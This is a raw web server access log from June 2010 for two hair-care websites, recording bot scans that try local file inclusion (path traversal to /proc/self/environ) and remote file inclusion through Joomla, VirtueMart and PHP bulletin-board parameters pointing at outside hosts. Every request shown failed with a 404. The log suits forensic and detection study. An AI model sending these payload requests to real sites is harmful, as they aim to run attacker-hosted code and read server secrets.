206.123.118.132 - - [21/Jun/2010:01:50:59 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:50:59 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:51:02 -0700] "GET /logs/access_100419.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:51:02 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:51:02 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:51:22 -0700] "GET /logs/access_100419.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:51:22 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
206.123.118.132 - - [21/Jun/2010:01:51:22 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:51:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:51:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:51:47 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:51:47 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:51:47 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:51:47 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:01:51:48 -0700] "GET /logs/access_100531.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:01:51:48 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.37.19.40 - - [21/Jun/2010:01:51:48 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.4.232.155 - - [21/Jun/2010:01:51:49 -0700] "GET /logs/access_100531.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.4.232.155 - - [21/Jun/2010:01:51:49 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
69.4.232.155 - - [21/Jun/2010:01:51:50 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:51:51 -0700] "GET /logs/access_100308.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:51:51 -0700] "GET /logs/access_100308.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.214.44.233 - - [21/Jun/2010:01:52:00 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "growlonghairfast.com"
91.214.44.233 - - [21/Jun/2010:01:52:00 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:52:03 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:52:03 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:52:03 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:52:06 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:52:06 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:52:06 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:52:10 -0700] "GET /logs/access_100308.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:52:10 -0700] "GET /logs/access_100308.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:01:52:29 -0700] "GET /logs/access_100419.log//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:01:52:29 -0700] "GET /g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:01:52:29 -0700] "GET /logs//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
67.228.62.66 - - [21/Jun/2010:01:52:29 -0700] "GET /logs/access_100426.log//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:01:52:51 -0700] "GET /g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:01:52:59 -0700] "GET /logs//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:01:52:59 -0700] "GET /logs/access_100419.log//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.92.165.130 - - [21/Jun/2010:01:52:59 -0700] "GET /logs/access_100426.log//g4/bbs//delete_all.php?board_skin_path=http://kangnung.org/zb/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:00 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:00 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:00 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:00 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:00 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:00 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.99.17.62 - - [21/Jun/2010:01:53:06 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:53:07 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:07 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:07 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:09 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:09 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:09 -0700] "GET /logs/access_100531.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:10 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:10 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:10 -0700] "GET /logs/access_100531.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:11 -0700] "GET /logs/access_100531.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:11 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:11 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:15 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:15 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:15 -0700] "GET /logs/access_100531.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:16 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:16 -0700] "GET /logs/access_100531.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.18.143 - - [21/Jun/2010:01:53:29 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
77.88.25.28 - - [21/Jun/2010:01:53:45 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14005 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:53:55 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:55 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:55 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:56 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:56 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:59 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:59 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:53:59 -0700] "GET /logs/access_100201.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.18.143 - - [21/Jun/2010:01:54:00 -0700] "GET /index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:54:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:54:56 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:54:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:54:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:54:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:54:56 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:54:56 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:54:56 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:54:56 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:54:57 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:54:57 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
74.124.198.60 - - [21/Jun/2010:01:54:57 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.116.59.107 - - [21/Jun/2010:01:55:38 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.116.59.107 - - [21/Jun/2010:01:55:38 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
209.116.59.107 - - [21/Jun/2010:01:55:38 -0700] "GET /logs/scripts.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.72.70.56 - - [21/Jun/2010:01:56:17 -0700] "GET /logs/access.log//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [21/Jun/2010:01:56:17 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
188.72.70.56 - - [21/Jun/2010:01:56:18 -0700] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:56:21 -0700] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:56:25 -0700] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:56:28 -0700] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.124.198.60 - - [21/Jun/2010:01:56:35 -0700] "GET /logs/access_100125.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.222.18.143 - - [21/Jun/2010:01:56:49 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.222.18.143 - - [21/Jun/2010:01:56:53 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
209.116.59.107 - - [21/Jun/2010:01:57:25 -0700] "GET /logs/access.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.116.59.107 - - [21/Jun/2010:01:57:25 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
209.116.59.107 - - [21/Jun/2010:01:57:25 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.73.150 - - [21/Jun/2010:01:57:34 -0700] "GET /PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://board.rampage-ro.com/hooks/.aA/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.73.150 - - [21/Jun/2010:01:57:34 -0700] "GET /logs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://board.rampage-ro.com/hooks/.aA/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.73.150 - - [21/Jun/2010:01:57:39 -0700] "GET /logs/access.log%20%20/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://board.rampage-ro.com/hooks/.aA/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.18.143 - - [21/Jun/2010:01:57:45 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
62.44.73.150 - - [21/Jun/2010:01:57:47 -0700] "GET /logs/access.log/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://board.rampage-ro.com/hooks/.aA/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.73.150 - - [21/Jun/2010:01:57:47 -0700] "GET /logs/PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://board.rampage-ro.com/hooks/.aA/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.73.150 - - [21/Jun/2010:01:57:47 -0700] "GET /PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://board.rampage-ro.com/hooks/.aA/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.222.18.143 - - [21/Jun/2010:01:58:18 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
62.44.73.150 - - [21/Jun/2010:01:59:08 -0700] "GET /PLUGINADMIN.php?GLOBALS[DIR_LIBS]=http://heart-selena.com/gallery/sql/id? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
